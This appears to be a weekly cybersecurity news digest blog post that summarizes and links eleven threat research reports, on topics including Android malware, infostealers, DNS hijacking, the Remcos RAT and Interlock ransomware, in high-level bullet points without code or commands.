Cybersecurity Wiretap #29: From DNS Hijacking to Remcos RAT with a Focus on Network Exploitation (week of 04/11/2024)

Welcome to the weekly digest about the Cybersecurity & Threats in the wild. Below you will find a very subjective summary of Cybersecurity events for the prior week.

1.CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging by @Securonix Threat Research

  • attackers deploy a custom-made emulated QEMU Linux box to persist on endpoints, delivered through phishing emails
  • Linux instance comes pre-configured with a backdoor that automatically connects to an attacker-controlled Command and Control (C2) server.
  • this setup allows the attacker to maintain a stealthy presence on the victim’s machine, staging further malicious activity within a concealed environment, making detection challenging for traditional antivirus solutions.

https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/

2. QUISHING THE NEW AGE THREAT IN DIGITAL FRAUD by @CyfirmaR

  • Quishing, the phishing scheme exploiting QR codes, is on the rise, with a 433% increase in reported incidents from 2023 to 2024
  • cybercriminals embed malicious links within QR codes, tricking users into revealing sensitive info
  • ~90% of these attacks target user credentials

https://www.cyfirma.com/research/quishing-the-new-age-threat-in-digital-fraud/

3. SpyNote: Unmasking a Sophisticated Android Malware by @CyfirmaR

  • distributed as a fake antivirus and, upon installation, adopts the name and icon of “Avast Mobile Security for Android” to deceive users
  • SpyNote leverages accessibility permission, which it uses to grant itself extensive control over the device, including excluding itself from battery optimization and enabling notifications
  • SpyNote simulates user gestures to grant itself further permissions silently in the background
  • displays continuous silent notifications about a fake system update
  • prevents uninstallation by simulating user actions to block removal attempts.

https://www.cyfirma.com/research/spynote-unmasking-a-sophisticated-android-malware/

4. WISH STEALER by @CyfirmaR

  • new Node.js-based malware targeting Windows users that steals sensitive data from Discord, browsers, and cryptocurrency wallets by exploiting user sessions and using privilege escalation
  • it extracts login credentials, cookies, and credit card details, and can disable antivirus software while monitoring 2FA codes

https://www.cyfirma.com/research/wish-stealer/

5. Life on a crooked RedLine: Analyzing the infamous infostealer’s backend by @ESETresearch

  • researchers with law enforcement, collected multiple modules used to run the infrastructure behind RedLine Stealer to provide insight into the internal workings of this malware-as-a-service empire
  • over 1,000 unique IP addresses used to host RedLine control panels

https://www.welivesecurity.com/en/eset-research/life-crooked-redline-analyzing-infamous-infostealers-backend/

6. Automatically Detecting DNS Hijacking in Passive DNS by PaloAlto’s #Unit42

  • threat actors compromise domains for a variety of different types of attacks, including meddler in the middle (MitM) attacks, drive-by downloads, phishing and scams
  • hijackers use a victim domain’s reputation to direct victims into malicious campaigns, independent of the expectations of its original visitors

https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/

7.Silent Skimmer Gets Loud (Again) by PaloAlto’s #Unit42

  • adversary compromising multiple web servers to gain access to the environment of a multinational organization headquartered in North America
  • based on overlaps in adversary infrastructure and tools, as well as tactics, techniques and procedures (TTPs), it’s possible to attribute the activity identified to the same threat actor behind the Silent Skimmer campaign

https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/

8. Threat Campaign Spreads Winos4.0 Through Game Application by #FORTIGUARD LABS

  • multiple samples of Winos4.0 malware hidden within gaming-related applications, including installation tools, speed boosters, and optimization utilities
  • analysis of the decoded DLL file reveals a potential targeting of the education sector, as indicated by its file description, “校园政务” (Campus Administration)

https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos4-through-game-application

9.New Campaign Uses Remcos RAT to Exploit Victims by #FORTIGUARD LABS

  • initialized with a phishing email containing a malicious Excel document
  • spreading a new variant of the Remcos RAT.

https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims

10. Unwrapping the emerging Interlock ransomware attack by @TalosSecurity

  • attacker used multiple components in the delivery chain including a Remote Access Tool (RAT) masquerading as a fake browser updater, PowerShell scripts, a credential stealer, and a keylogger before deploying and enabling the ransomware encryptor binary
  • primarily used remote desktop protocol (RDP) to move laterally within the victim’s network, as well as other tools such as AnyDesk and PuTTY
  • used Azure Storage Explorer, which leverages the utility AZCopy, to exfiltrate data to an attacker-controlled Azure storage blob.

https://blog.talosintelligence.com/emerging-interlock-ransomware/

11. Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations by @TrendMicro

  • Earth Estries employs two distinct attack chains in their campaigns that have some common characteristics, such as the exploitation of vulnerabilities in systems like Microsoft Exchange servers and network adapter management tools.
  • 1st chain uses PsExec and tools such as Trillclient, Hemigate, and Crowdoor delivered via CAB files
  • 2nd chain employs malware like Zingdoor and SnappyBee, delivered through cURL downloads

https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html

Thank you for reading.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.